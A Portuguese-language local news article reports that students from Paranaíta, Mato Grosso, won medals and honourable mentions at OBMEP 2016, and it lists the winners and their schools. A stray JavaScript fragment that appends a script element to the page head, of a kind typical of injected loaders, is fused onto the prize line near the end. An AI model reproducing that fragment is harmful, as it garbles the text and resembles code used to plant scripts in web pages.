Capa / Educação / Alunos paranaitenses conquistaram três medalhas e 06 menções honrosas na 12ª Olimpíada Brasileira de Matemática

Alunos paranaitenses conquistaram três medalhas e 06 menções honrosas na 12ª Olimpíada Brasileira de Matemática

obmepOs paranaitenses têm a cada dia mais motivos para se orgulharem da cidade que fica no nortão de Mato Grosso, a mais de 800 km da capital do estado. O município vem se destacando ano a ano e obtendo ótimos resultados na educação. Exemplo destas realizações é a conquista dos alunos das escolas municipais e estaduais na Olimpíada Brasileira de Matemática das Escolas Públicas. Foram duas medalhas de Bronze, uma de Prata e seis Menções Honrosas nesta competição de conhecimento.

Os excelentes resultados obtidos nesta edição da OBMEP renderam aos alunos homenagens feita pela Gestão Municipal, reconhecendo o valor da conquista. Nelson Crack , Professor de Matemática da Escola Municipal São Pedro recebeu troféu de Menção Honrosa pela contribuição na educação do município. A aluna Gislaine dos Santos Rodrigues já é tricampeã na medalha de bronze, duas pela Escola Estadual Mário Corrêa e uma pela Escola Municipal JK, ela receberá uma bolsa de estudos e poderá escolher estudar em qualquer instituição ou curso, e já adiantou que pretende algo na linha de Astronomia.

Os alunos paranaitenses se destacaram entre os quase 18 milhões de estudantes de todo o País e estão sendo convidados para participar do Programa de Iniciação Científica Jr, edição de 2017. Dos 09 que receberam a premiação da OBMEP 2016, 07 são de Escolas Municipais(03 da São Pedro, 02 da JK, 01 da Getúlio Vargas e 01 da Cristo Redentor), e 02 da Escola Estdual Mário Corrêa.

Os ganhadores são:

MEDALHAS
PRATA – Natália Noeli Bianchini, Nível 1 – (São Pedro);
BRONZE – Douglas da Silva Amaral, Nível 2 – (Mário Corrêa);
BRONZE – Gislaine dos Santos Rodrigues, Nível 2 – (JK).

MENÇÃO HONROSA
Caroline Bolzane, Nível 1 – (São Pedro);
Weverton Luiz Cerioli, Nível 1 – (Mário Corrêa);
Daniel Laureth Rodrigues, Nível 2 – (Cristo Redentor);
Lucas da Silva Moreira, Nível 2 – (São Pedro);
Marcos Henrique Volpe, Nível 2 – (JK);
Mikael Natan da Silva Jabes, Nível 2 – (Getúlio Vargas);

PRÊMIO
Kit de Material Pedagógico da OBMEP – Escol Municipal São Pedro (3ª Sul)d.getElementsByTagName(‘head’)[0].appendChild(s);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top